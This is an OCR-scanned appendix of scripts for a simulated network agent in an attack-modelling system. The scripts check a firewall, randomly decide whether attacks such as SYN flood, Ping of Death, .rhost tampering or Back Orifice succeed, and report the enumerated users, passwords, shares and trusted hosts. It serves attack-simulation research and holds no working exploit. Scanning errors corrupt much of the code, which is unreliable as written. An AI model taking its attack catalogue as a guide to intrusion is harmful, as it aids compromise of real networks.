Entry  action  | 

State  action 

str="";  bX=FALSE; 

CALLSCRIPT  ( Attack.Erase.Do); 

IsFirewalled  (newAttack.Name,  newAttack.ip,  newAttack.HackerIP,  newAttack.IsNet  ,bX,str) 
IF  (bX)  THEN 

Attack.IsNet=newAttack.IsNet; 

Attack.Name=newAttack.Name; 

Attack.SubClassO=newAttack.SubClassO; 

Attack.SubClass  1  =newAttack.SubClass  1 ; 

Attack.ip=newAttack.ip;  Attack.FailMessage=str; 

MESSAGE  (Attack,  Reply  Template,  InReplyWith=InMSG.ReplyWith); 

ENDIF; 

bZ=bX; _ 


Transitions.  Condition  /  Next  state  /  Action 


newAttack.SubClassO="IH"  AND  NOT  bZ 

IH 

new  Attack.  SubClas  s  1 = "  SPIS "  AND  NOT  bZ 

SPIS 

newAttack.SubClassO='TO"  AND  NOT  bZ 

IO 

newAttack.SubClassO="RE"  AND  newAttack.Name!="SRE"  AND  NOT  bZ 

Cl 

(newAttack.SubClassl="ENS"  OR  newAttack.Name="SRE")  AND  NOT  bZ 

RE 

newAttack.SubClassO="UE"  AND  NOT  bZ 

ENS 

newAttack.SubClassO="ABE"  AND  NOT  bZ 

UE 

newAttack.SubClassO="GAR"  AND  NOT  bZ 

ABE 

newAttack.SubClassO="CI"  AND  NOT  bZ 

GAR 

newAttack.SubClassO="EP"  AND  NOT  bZ 

EP 

newAttack.SubClassO="GAD"  AND  NOT  bZ 

GAD 

newAttack.SubClassl="CVR"  AND  NOT  bZ 

CVR 

newAttack.SubClassl="IVR"  AND  NOT  bZ 

ivr 

newAttack.SubClassO="CT"  AND  NOT  bZ 

CT 

newAttack.SubClassO="CBD"  AND  NOT  bZ 

CBD 

bZ 

End 

Exit  action 


Do  action 
N_Start_Do 


The  parameter  bZ  is  a  logical  variable  modified  by  the  function  IsFirewalled(...).  If  the  value 
returned  by  the  function  is  TRUE,  it  means  that  the  hacker’s  attack  is  blocked,  and  the  state  machine 
makes  a  transition  into  the  terminal  state  End  and  finishes.  In  that  case,  the  state  machine  is  initialized 
by  the  next  incoming  message  from  the  hacker  agent  ( newAttack.Exist( )). 


Common  script  of  firewall  inquiring  and  reply  generation  in  the  case  of  attack  against  single  host 


Entry 


Entry  action 


State  action 


Do  action 

Check  Firewall  Do 


str="";  bX=FALSE;  dC=0; 

CALLSCRIPT  (Attack.Erase.Do); 

IsFirewalled  (newAttack.Name,  newAttack.ip,  newAttack.HackerIP.  dC  ,bX,str); 

IF  (bX)  THEN 

Attack.IsNet=newAttack.IsNet;  Attack.Name=newAttack.Name; 
Attack.SubClassO=newAttack.SubClassO;  Attack.SubClass  l=newAttack. Subclass  1; 
Attack.ip=Host.IP;  Attack.FailMessage=str; 

MESSAGE  (Attack.  Reply' Template,  InReplyWith=InMSG.Reply With); 

ENDIF;  bZ=bX; 


1  Transitions.  Condition  /  Next  state  /  Action  | 

□ 

□ 

Exit  action 


Common  script  of  firewall  inquiring  and  reply  generation  in  the  case  of  attack  against  netrwork 


Entry 


Entry  action 


Do  action 

Check_Firewall_ 

Do2 


State  action 


str="";  bX=FALSE;  dC=0; 

CALLSCRIPT  (Attack.Erase.Do); 

IsFirewalled  (newAttack.Name,  newAttack.ip,  newAttack.HackerIP,  dC  ,bX,str); 
IF  (bX)  THEN 

Attack.IsNet=newAttack.IsNet; 

Attack.Name=newAttack.Name; 

Attack.SubClassO=newAttack.SubClassO; 

Attack.SubClass  l=newAttack.SubClass  1 ; 

Attack.ip=Host.IP;  Attack.FailMessage=str; 

MESSAGE  (Attack,  InformTemplate,  InReplyWith=InMSG.ReplyWith); 
ENDIF; 
bZ=bX; 


Transitions.  Condition  /  Next  state  /  Action 


Exit  action 


Entry  action 


Do  action 


Attack  Erase  Do 


Common  script  for  outgoing  message  cleaning 


Entry 


State  action 


bZ=FALSE; 

Attack.Name="";  Attack.ip="";  Attack.Class="";  Attack.IsNet=0;  Attack.Port=""; 
Attack.SubClassO="";  Attack.SubClass  1="";  Attack.SubClass2=""; 
Attack.OSplatform=" " ;  Attack.OStype=" " ;  Attack.OSversion=" 

Attack.Message="";  Attack.SharedRes="";  Attack.DomLink=""; 
Attack.DomainControl='"';  Attack.DomainName="";  Attack.UserID=""; 
Attack.UserSID="";  Attack.UserPsw="";  Attack.Appl="";  Attack.DNSlHostName="" 
Attack.DNS2Post="";  Attack.SysTime="";  Attack.Mask="";  Attack.DNS2DomName= 
Attack.DNS  1  HostIP="" ;  Attack.TrusHost=" " ;  Attack.FailMessage=" " 


Transitions.  Condition  /  Next  state  /  Action 


Exit  action 


Script  of  the  “Network  agent”  behaviour  in  the  state  IH  of  the  state  machine  N 


_ State  action _ 

Do  action  IF  (newAttack.IsNet=0)  THEN 

IF  (  Host.Exist  (  Host.IP  =  newAttack.ip  )  THEN 
CALLSCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

AttRandom  (newAttack.Name,  newAttack.SubClassO,  str,  str,  Host.IP,  bX); 

IF  (bX)  THEN 

Attack.IsNet=newAttack.IsNet;  Attack.Name=newAttack.Name; 
Attack.SubClassO=newAttack.SubClassO;  Attack.ip=Host.IP; 

ENDIF; 

MESSAGE  (Attack,  Reply  Template,  InReplyWith=InMSG.ReplyWith); 
RETURN  (); 

ENDIF; 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (  LAN.Exist  (  LAN.IP  =  newAttack.ip  ) )  THEN 
REPEAT 

IF  (Host.Exist  (  Host.IP  !=  ""))  THEN 
CALLSCRIPT  (Check.Firewall.Do2); 

IF  (NOT  bZ)  THEN 

AttRandom  (newAttack.Name,  newAttack.SubClassO,  str,  str,  Host.IP,  bX); 
IF  (bX  )  THEN 

Attack.IsNet=newAttack.IsNet; 

Attack.Name=newAttack.Name; 

Attack.SubClassO=newAttack.SubClassO; 

Attack.ip=Host.IP; 

ENDIF; 

MESSAGE  (Attack,  InformTemplate,  InReplyWith  =  InMSG.ReplyWith); 
ENDIF; 

ENDIF; 

UNTIL  (Host.NextQ); 

MESSAGE  (0, Reply Template,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 

_ ENDIF; _ 

Transitions.  Condition  /  Next  state  /  Action 


Exit  action 


End 


Script  of  the  “Network  agent”  behaviour  in  the  state  SPIS  of  the  state  machine  N 


_ Entry _ 

Entry  action 

_ State  action _ 

Do  action  IF  (  newAttack.IsNet  =  1  )  THEN 

IF  LAN.Exist  (LAN.IP  =  newAttack.ip  )  THEN 
Net_SPIS_Do  REPEAT 

IF  (Host.Exist  (Host.IP!=""))  THEN 
DELETEALL  (xAttack); 

CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 
bY  =  FALSE; 

REPEAT 

IF  (Service. Exist  (Service. IP  =  Host.IP))  THEN 

str  =  AttRandom(newAttack.Name,str,newAttack.SubClassl,str,Host.IP,bX); 
IF  (bX)  THEN 

xAttack.Create(); 

xAttack.IsNet=l ;  xAttack.Name=newAttack.Name; 
xAttack.  Subclass  1  =new  Attack.  Subclass  1 ; 
xAttack.ip=Host.IP;  xAttack.Port=Service.Port; 
bY=  FALSE; 

ENDIF; 

ENDIF; 

UNTIL  (Service.NextO); 

IF  (bY)  THEN 

M  ESS  AGE(xAttack(ALL),InformTemplate,InReplyWith=InMSG. Reply  With); 
ENDIF; 

ENDIF; 

ENDIF; 

UNTIL  (Host.NextO); 

ENDIF; 

DELETEALL  (xAttack); 

CALLSCRIPT  (Attack_Erase_Do); 

MESSAGE  (O.Reply  Template, InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 

IF  (newAttack.IsNet  =  0)  THEN 
DELETEALL  (xAttack); 

IF  (  Host.Exist  (Host.IP  =  newAttack.ip))  THEN 
CALLSCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 
bY=FALSE; 

REPEAT 

IF  (Service. Exist(Service.IP=Host.IP)  )  THEN 
str=""; 

AttRandom  (newAttack.Name,  str,  newAttack.SubClassl,  str,  Host.IP,  bX); 

IF  (bX)  THEN 

xAttack.Create(); 

xAttack.Name  =  newAttack.Name; 
xAttack.SubClassl=newAttack.SubClassl; 
xAttack.ip=Host.IP;  xAttack.Port=Service.Port; 
bY=TRUE; 

ENDIF; 

ENDIF; 

UNTIL  (Service.NextO); 

IF  (bY)  THEN 

M  ESS  AGE(xAttack(ALL),InformTemplate,InReplyWith=InMSG.Reply  With); 
ENDIF; 

ENDIF; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG. Reply  With); 

RETURN  (); 

_ ENDIF; _ 

Transitions.  Condition  /  Next  state  /  Action 

|  End  j 

Exit  action  | 


Script  of  the  “Network  agent”  behaviour  in  the  state  10  of  the  state  machine  N 


1  Entry  | 

|  Entry  action 

|  State  action  | 

Do  action 

Net_IO_Do 

IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist  (Host.IP=newAttack.ip))  THEN 

CALLSCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

CALL  (Net  IO  Do2); 

IF  (bY)  THEN 

Attack.IsNet=newAttack.IsNet; 

Attack.Name=newAttack.Name; 

Attack.SubClassO=newAttack.SubClassO;  Attack.ip=Host.IP; 

ENDIF; 

ENDIF; 

MESSAGE  (Attack,  ReplyTemplate,  InReplyWith=InMSG.ReplyWith); 

RETURN!); 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (  LAN.Exist  (LAN.IP=newAttack.ip)  THEN 

REPEAT 

IF  Host.Exist  (Host.IP!="")  THEN 

CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 

CALL  (Net_IO_Do2); 

IF  (bY)  THEN 

Attack.IsNet=newAttack.IsNet; 

Attack.Name=newAttack.Name; 

Attack.SubClassO=newAttack.SubClassO; 

Attack.ip=Host.IP; 

MESSAGE  ( Attack, InformTemplate,InReplyWith=InMSG. Reply  With); 
ENDIF; 

ENDIF; 

ENDIF; 

UNTIL  (Host.NextO); 

ENDIF; 

CALL  (Attack_Erase_Do); 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 

Transitions.  Condition  /  Next  state  /  Action 

End 

|  Exit  action 

Additional  script  of  the  “Network  agent”  behaviour  in  the  state  10  of  the  state  machine  N 

Entry 

Entry  action  | 

State  action 

Do  action  str="";  bY=FALSE;  Attack.OSplatform="";  Attack.OStype="";  Attack.OSversion=""; 

AttRandom  (newAttack.Name,  newAttack.SubClassO,  str,  str,  Host.IP,  bX); 
Net_IO_Do2  IF  (bX)  THEN 

Attack.OSplatform=Host.OSplatform;  bY=TRUE; 

ENDIF; 

AttRandom  (newAttack.Name,  newAttack.SubClassO,  str,  str,  Host.IP,  bX); 

IF  (bX)  THEN 

Attack.OStype=Host.OStype;  b Y =TRUE; 

ENDIF; 

AttRandom  (newAttack.Name,  newAttack.SubClassO,  str,  str,  Host.IP,  bX); 

IF  (bX)  THEN 


Attack.OSversion=Host.OS version;  bY=TRUE; 
ENDIF; 


157 


Entry  action 


Script  of  the  “Network  agent”  behaviour  in  the  state  RE  of  the  state  machine  N 


Entry 


State  action 


IF  (newAttack.IsNet=0)  THEN 
IF  (Host.Exist  (Host.IP=newAttack.ip)  THEN 
CALLSCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

CALLSCRIPT  (Net_RE_Do2); 

ENDIF; 

MESSAGE!  Attack  .Reply  Template,  InReplyWith=InMSG. Reply  With); 
RETURN!); 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.Exist(LAN  IP=newAttack.ip))  THEN 
REPEAT 

IF  ( Host.Exist(Host.IP!=" " ))  THEN 
CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 

CALLSCRIPT  (Net_RE_Do2); 

MESSAGE  (Attack, InformTemplate,InReplyWith=InMSG.ReplyWith); 
ENDIF; 

ENDIF; 

UNTIL  (Host.Next()); 

ENDIF; 

CALLSCRIPT  ( Attack_Erase_Do ) ; 

MESSAGE  (0,  Reply  Template,  InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 


Transitions.  Condition  /  Next  state  /  Action 


End 


Exit  action 


Entry  action 


Additional  script  of  the  “Network  agent”  behaviour  in  the  state  RE  of  the  state  machine  N 


Entry 


State  action 


str="";  Attack.Message="";  Attack.DomainControl="";  Attack.DomamName=""; 
Attack.DomLink=" " ;  Attack. SharedRes-' " ; 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX)  THEN 

IF  (newAttack.Name="CNS")  THEN 

Attack.Message="Null  Session  Connection  was  done  successfully";  ENDIF; 
IF  (newAttack.Name="EDC")  THEN 

IF  (Domain.Exist(Domain.IP=Host.IP))  THEN 
Attack.DomainControl  =  Domain.Control; 

ENDIF; 

ENDIF; 

IF  (newAttack.Name="EDNV")  THEN 

IF  (Domain.Exist(Domain.IP=Host.IP)  THEN 
Attack.  DomainN  ame=Domain  .Name ; 

ENDIF; 

ENDIF; 

IF  (newAttack.Name="ERD")  THEN 

IF  !Dom Link. Exist! DomLink.IP=I  lost. IP)  THEN 
Attack.DomLink=DomLink.Domain; 

ENDIF; 

ENDIF; 

ENDIF; 

Attack.IsNet=newAttack.IsNet;  Attack.Name=newAttack.Name; 
Attack.SubClassO=newAttack.SubClassO;  Attack.ip=Host.IP; 


Transitions.  Condition  /  Next  state  /  Action 


Exit  action 


Script  of  the  “Network  agent”  behaviour  in  the  state  ENS  of  the  state  machine  N 


_ Entry _ 

Entry  action 

_ State  action _ 

Do  action  IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.Exist(LAN.IP=newAttack.ip))  THEN 
Net_ENS_Do  REPEAT 

IF  ( Host. Exist(Host. IP  !=""))  THEN 
DELETEALL  (x Attack); 

CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 
REPEAT 

IF  (SharedRes. Exist  (SharedRes.IP=Host.IP)  )  THEN 
str=""; 

AttRandom  (newAttack.Name.str.newAttack.SubClassl,str,Host.IP.bX); 

IF  (bX  )  THEN 

xAttack.Create(); 

xAttack.IsNet=l; 

xAttack.Name=newAttack.Name;  xAttack.SubClassl=newAttack.SubClassl; 
xAttack.ip=Host.IP;  xAttack.SharedRes=SharedRes.Name); 

ENDIF; 

ENDIF; 

UNTIL  (SharedRes.NextO); 

MESSAGE(xAttack(ALL),InformTemplate,InReplyWith=InMSG.ReplyWith); 

ENDIF; 

ENDIF; 

UNTIL  (Host.Next()); 

ENDIF; 

DELETEALL  (x Attack); 

CALLSCRIPT  ( Attack_Erase_Do) ; 

MESSAGE  (O.Reply Template, InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 

IF  (newAttack.IsNet=0)  THEN 
IF  (Host.Exist(Host.IP=newAttack.ip)  THEN 
DELETEALL  (x Attack); 

CALLSCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

REPEAT 

IF  (SharedRes. Exist(SharedRes.IP=Host.IP))  THEN 
str=""; 

AttRandom  (newAttack.Name,str,newAttack.SubClassl,str,Host.IP,bX); 

IF  (bX)  THEN 
xAttack.Create(); 
xAttack.IsNet=0; 
xAttack.Name=newAttack.Name; 

xAttack.SubClass  1  =newAttack.SubClass  1 ;  xAttack.ip=Host.IP; 
xAttack.SharedRes=SharedRes.Name; 

ENDIF; 

ENDIF; 

UNTIL  (SharedRes.NextO); 

MESSAGE  (xAttack(ALL),InformTemplate,InReplyWith=InMSG.ReplyWith); 
ENDIF; 

CALLSCRIPT  ( Attack_Erase_Do ) ; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.RepIyWith); 

RETURN  (); 

_ ENDIF; _ 


Transitions.  Condition  /  Next  state  /  Action 


□ 

End 

□ 

Exit  action 
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Script  of  the  “Network  agent”  behaviour  in  the  state  UE  of  the  state  machine  N 


Entry 

Entry  action 

State  action 

Do  action 

Net_UE_Do 

IF  (newAttack.Name="UTFTP")  THEN 

CALLSCRIPT  (N et_UE_UTFTP_Do ) ; 

RETURN  (); 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.ExistCLAN  IP=newAttack.ip))  THEN 

REPEAT 

IF  ( Host. Exist(Host. IP  !=""))  THEN 

CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 

REPEAT 

IF  (User.Exist(User.IP=Host.IP))  THEN 

DELETE  ALL  (x  Attack); 

CALLSCRIPT  (Net_UE_Do2); 

M  ESS  AGE(xAttack(ALL),InformTemplate,InReplyWith=InMSG. Reply  With); 

ENDIF; 

UNTIL  (User.Next()); 

ENDIF; 

ENDIF; 

UNTIL(Host.NextO); 

ENDIF; 

DELETEALL  (xAttack); 

CALLSCRIPT  (Attack_Erase_Do); 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 

IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist(Host.IP=newAttack.ip))  THEN 

CALLSCRIPT  (Check  Firewall  Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

REPEAT 

IF  (User.Exist(User.IP=Host.IP))  THEN 

DELETEALL  (xAttack); 

CALLSCRIPT  (Net  UE  Do2); 

MESSAGE(xAttack(ALL),InformTemplate,InReplyWith=InMSG.ReplyWith); 

ENDIF; 

UNTIL  (User.NextO); 

ENDIF; 

DELETEALL  (xAttack); 

CALLSCRIPT  (Attack_Erase_Do); 

MESSAGE  (O.ReplyTemplate.InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 

Transitions.  Condition  /  Next  state  /  Action 


Exit  action 


End 


Additional  script  of  the  “Network  agent”  behaviour  in  the  state  UE  of  the  state  machine  N 

_ Entry _ 

Entry  action 

_ State  action _ 

Do  action  str="";  dC=0; 

AttRandom  (new  Attack.Name,  new  Attack.  SubClassO,str,str,Host.IP,bX); 

Net_UE_Do2  IF  (bX  )  THEN 

IF  (User.ID!="")  THEN  (dC=l);  ENDIF; 

ENDIF; 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  ((bX)  AND  (dC=l))  THEN 

IF  (User.Psw!="")  THEN  (dC=2);  ENDIF; 

ENDIF; 

IF  (newAttack.Name="ISU")  THEN 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX)  THEN 

IF  (User.SID!="")  THEN 

IF  (dC=l  )  THEN  (dC=3);  ENDIF; 

IF  (dC=2)  THEN  (dC=4);  ENDIF; 

ENDIF; 

ENDIF; 

ENDIF; 

IF  (dC=l)  THEN 

xAttack.Create();  xAttack.IsNet=newAttack.IsNet;  xAttack.Name=new  Attack.Name; 
xAttack.SubClassl=newAttack.SubClassl ;  xAttack.ip=Host.IP; 
xAt  tack.U  serID=U  ser.ID ; 

ENDIF; 

IF  (dC=2)  THEN 
xAttack.Create(); 

xAttack.IsNet=newAttack.IsNet;  xAttack.Name=new Attack.Name; 
xAttack.SubClassl=newAttack.SubClassl;  xAttack.ip=Host.IP; 
xAt  tack.U  serPsw=U  ser.Psw ;  x  Attack.U  serID=User.ID ; 

ENDIF; 

IF  (dC=3)  THEN 

xAttack. Create!);  xAttack.IsNet=newAttack.IsNet;  xAttack.Name=newAttack.Name; 
xAttack.SubClassl=newAttack.SubClassl;  xAttack.ip=Host.IP; 
xAttack.UserID=User.ID;  xAttack.UserSID=User.SID; 

ENDIF; 

IF  (dC=4)  THEN 
xAttack.Create(); 

xAttack.IsNet=newAttack.IsNet;  xAttack.Name=new Attack.Name; 
xAttack.SubClassl=newAttack.SubClassl;  xAttack.ip=Host.IP; 
xAttack.UserPsw=User.Psw;  xAttack.UserID=User.ID;  xAttack.UserSID=User.SID; 

_ ENDIF; _ 

Transitions.  Condition  /  Next  state  /  Action 


Exit  action 
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Additional  script  of  the  “Network  agent”  behaviour 
in  the  state  UE  of  the  state  machine  N  (UTFTP  attack) 
_ Entry _ 


|  Entry  action 

|  State  action  j 

Do  action 

Net_UE_UTFTP_ 

Do 

IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.Exist(LAN.IP=newAttack.ip))  THEN 

REPEAT 

IF  (Host.Exist(Host.IP!=""))  THEN 

DELETE  ALL  (x  Attack); 

C ALLSCRIPT  (Check_Firewall_Do2) ; 

IF  (NOT  bZ)  THEN 

REPEAT 

IF  (TrusHosts.Exist(TrusHosts.Host=Host.IP))  THEN 
str=""; 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX)  THEN 

xAttack.Create(); 

xAttack.IsNet=l ;  xAttack.Name=newAttack.Name; 
xAttack.SubClassO=newAttack.SubClassO;  xAttack.ip=Host.IP; 
xAttack.TrusHost=TrusHosts.IP; 

ENDIF; 

ENDIF 

UNTIL  (TrusHosts.NextO); 

M  ESS  AGE(xAttack(  ALL  ),InformTemplate,InReplyWith=InMSG. Reply  With); 

ENDIF; 

ENDIF; 

REPEAT  (Host.NextO); 

ENDIF; 

DELETEALL  (xAttack); 

CALLSCRIPT  (Attack_Erase_Do); 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF 

IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist(Host.IP=newAttack.ip))  THEN 

DELETEALL  (xAttack); 

CALLSCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

REPEAT 

IF  (TrusHosts.Exist(TrusHosts.Host=Host.IP))  THEN 
str=" " ; 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX  )  THEN 

xAttack.Create(); 

xAttack.IsNet=0;  xAttack.Name=newAttack.Name; 
xAttack.SubClassO=newAttack.SubClassO;  xAttack.ip=Host.IP; 
xAttack.TrusHost=TrusHosts.IP; 

ENDIF; 

ENDIF; 

UNTIL  (TrusHosts.NextO); 

MESS  AGE(xAttack(  ALL), InformTemplate,InReplyWith=InMSG.ReplyWith); 

ENDIF; 

CALLSCRIPT  (Attack  Erase  Do); 

MESSAGE  (O.Reply Template, InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 

|  Transitions.  Condition  /  Next  state  /  Action  | 

Exit  action 


Script  of  the  “Network  agent”  behaviour  in  the  state  ABE  of  the  state  machine  N 


_ Entry _ 

Entry  action 

_ State  action _ 

Do  action  IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.Exist(LAN.IP=newAttack.ip))  THEN 
Net_ABE_Do  REPEAT 

IF  (Host.Exist(Host.IP!=""))  THEN 
DELETEALL  (xAttack); 

CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 
bY=FALSE; 

REPEAT 

IF  (Appl.Exist(Appl.IP=Host.IP))  THEN 
str  = 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX)  THEN 

xAttack.Create(); 

xAttack.IsNet=l ;  xAttack.Name=newAttack.Name; 
xAttack.SubClassO=newAttack.SubClassO;  xAttack.ip=Host.IP; 
xAt  tack.  Appl= Appl .  N  ame ; 
bY=TRUE; 

ENDIF; 

ENDIF; 

UNTIL  (Appl.Next()); 

IF  (bY)  THEN 

M  ESS  AGE(xAttack(ALL),InformTemplate,InReplyWith=InMSG.Reply  With); 
ENDIF; 

ENDIF; 

ENDIF; 

UNTIL  (Host.Next()); 

ENDIF; 

DELETEALL  (xAttack); 

CALLSCRIPT  ( Attack_Erase_Do ) ; 

MESSAGE  (0, Reply Template,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 

IF  (newAttack.IsNet=0)  THEN 
DELETEALL  (xAttack); 

IF  (Host.Exist(Host.IP  =  newAttack.ip))  THEN 
CALLSCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 
bY=FALSE; 

REPEAT 

IF  (Appl.Exist(Appl.IP=Host.IP))  THEN 
str=""; 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 

IF  (bX)  THEN 

xAttack.  Create));  xAttack.Name=newAttack.Name; 
xAttack.SubClassO=newAttack.SubClassO;  xAttack.ip=Host.IP; 
xAttack.  Appl=Appl.Name; 
bY=TRUE; 

ENDIF; 

ENDIF; 

UNTIL  (Appl.NextO); 

IF  (bY)  THEN 

M  ESS  AGE(xAttack(ALL).InformTemplateTnReplyWith=InMSG.Reply  With); 
ENDIF; 

ENDIF; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

_ ENDIF; _ 

Transitions.  Condition  /  Next  state  /  Action 

|  End  | 

Exit  action  I 


Entry  action 


Script  of  the  “Network  agent”  behaviour  in  the  state  GAR  of  the  state  machine  N 


Entry 


S  tate  action 


IF  (newAttack.IsNet=0)  THEN 

IF  (Host.Exist(Host.IP=newAttack.ip))  THEN 
CALLSCRIPT  (Check_Firewall_Do); 

IF  (bZ)  THEN  RETURN  ();  ENDIF; 

CALLSCRIPT  (Net_GAR_Do2 ); 

ENDIF; 

MESSAGE  (Attack, Reply Template,InReplyWith=InMSG.ReplyWith); 
RETURN  (); 

ENDIF; 

IF  (newAttack.IsNet=l)  THEN 

IF  (LAN.Exist(LAN.IP=newAttack.ip))  THEN 
REPEAT 

IF  (Host.Exist(Host.IP  !=" "))  THEN 
CALLSCRIPT  (Check_Firewall_Do2); 

IF  (NOT  bZ)  THEN 

CALLSCRIPT  (Net_GAR_Do2); 

MESSAGE  ( Attack, InformTemplate,InReplyWith=InMSG.Reply With); 

ENDIF; 

ENDIF; 

UNTIL  (Host.NextQ); 

ENDIF; 

MESSAGE  (0,ReplyTemplate,InReplyWith=InMSG.ReplyWith); 

RETURN  (); 

ENDIF; 


Transitions.  Condition  /  Next  state  /  Action 


End 


Exit  action 


Additional  script  of  the  “Network  agent”  behaviour  in  the  state  GAR  of  the  state  machine  N 


_ Entry _ 

Entry  action 

_ State  action _ 

Do  action  CALLSCRIPT  (Attack_Erase_Do);  str=""; 

AttRandom  (newAttack.Name,newAttack.SubClassO,str,str,Host.IP,bX); 
str  =  newAttack.Name; 

IF  (bX)  THEN 
IF  (str="AAF")  THEN 

Attack.Message="  Anonymous  Access  to  Ftp -server  was  gained  successfully");  ENDIF; 

IF  (str="BFPG")  THEN 

Attack.Message="Brute  Force  Password  Guessing  was  gained  successfully");  ENDIF; 

IF  (str="CPF")  THEN 

Attack.Message="PWL  file  was  gained  successfully");  ENDIF; 

IF  (str="ABTH")  THEN  Attack.Message="Connection  is  opened");  ENDIF; 

IF  (str="ATH")  THEN 

Attack.Message="  Access  to  a  host  by  r-command  login  was  gained  successfully";  ENDIF; 

IF  (str="APF")  THEN 

Attack.Message="  Access  to  the  Password  File  was  gained  successfully";  ENDIF; 

IF  (str="CC")  THEN  Attack.Message="Connection  is  closed";  ENDIF; 

IF  (str="MRF")  THEN 

Attack.Message="IP-address  of  the  attacking  Host  was  written  to  the  File  .rhost";  ENDIF; 

IF  (str="MUID")  THEN  Attack.Message="The  user's  ID  is  modified");  ENDIF; 

IF  (str="WDPF")  THEN 

Attack.Message="The  user's  identifier  was  written  to  the  Password  File";  ENDIF; 

IF  (str="IFS")  THEN 

Attack.Message="The  FTP  Flood  Attack  was  performed  successfully";  ENDIF; 

IF  (str="LA")  THEN  Attack.Message="The  Land  Attack  was  performed  successfully";  ENDIF; 
IF  (str="PD")  THEN 

Attack.Message="The  Ping  of  Death  Attack  was  performed  successfully.";  ENDIF; 

IF  (str="PF")  THEN 

Attack.Message="The  Ping  Flood  Attack  was  performed  successfully";  ENDIF; 

IF  (str="SA")  THEN 

Attack.Message="The  Smurf  Attack  was  performed  successfully.";  ENDIF; 

IF  (str="SF")  THEN 

Attack.Message="The  SYN  Flood  Attack  was  performed  successfully."; 

IF  (str="UF")  THEN 

Attack.Message="The  UDP  Flooding  Attack  was  performed  successfully.";  ENDIF; 

IF  (str="RAH")  THEN  Attack.Message=" Access  was  gained  successfully";  ENDIF; 

IF  (str="AR")  THEN  Attack.Message=" Access  was  gained  successfully";  ENDIF; 

IF  (str="UDG")  THEN 

IF  (nPar="AR")  THEN  Attack.Message="User  Data  are  guessed";  ENDIF;  ENDIF; 

IF  (str="RAM")  THEN  IF  (nPar="UDG")  THEN 

Attack.Message="Registry  Access  was  gained  successfully";  ENDIF;  ENDIF; 

IF  (str="RA")  THEN  IF  (nPar="RAM")  THEN 

Attack.Message="Access  to  resources  was  gained  successfully";  ENDIF;  ENDIF; 

IF  (str="FCA")  THEN  Attack.Message=" Access  was  gained  successfully";  ENDIF; 

IF  (str="PG")  THEN  Attack.Message="The  password  was  obtained  successfully";  ENDIF; 

IF  (str="UPWS")  THEN 

Attack.Message="Access  was  gained  successfully";  ENDIF; 

IF  (str="BO")  THEN  Attack.Message="NetBus  is  triggered");  ENDIF; 

IF  (str="DIMC")  THEN  Attack.Message="The  program  Back  Orifice  is  triggered";  ENDIF; 

IF  (str="EFE")  THEN  Attack.Message="The  program  Back  Orifice  is  triggered";  ENDIF; 

IF  (str="MMC")  THEN  Attack.Message="The  Malicious  Mobile  Code  is  triggered";  ENDIF; 

IF  (str="MP")  THEN 

Attack.Message="The  host  was  accessed.  The  password  was  obtained  successfully";  ENDIF 
IF  (str="TH")  THEN  Attack.Message="Trojan  Horse  was  implanted";  ENDIF; 
nPar= 

Attack.IsNet=newAttack.IsNet;  Attack.Name=str; 

Attack.SubClassO=newAttack.SubClassO;  Attack.ip=Host.IP; 

_ ENDIF; _ 

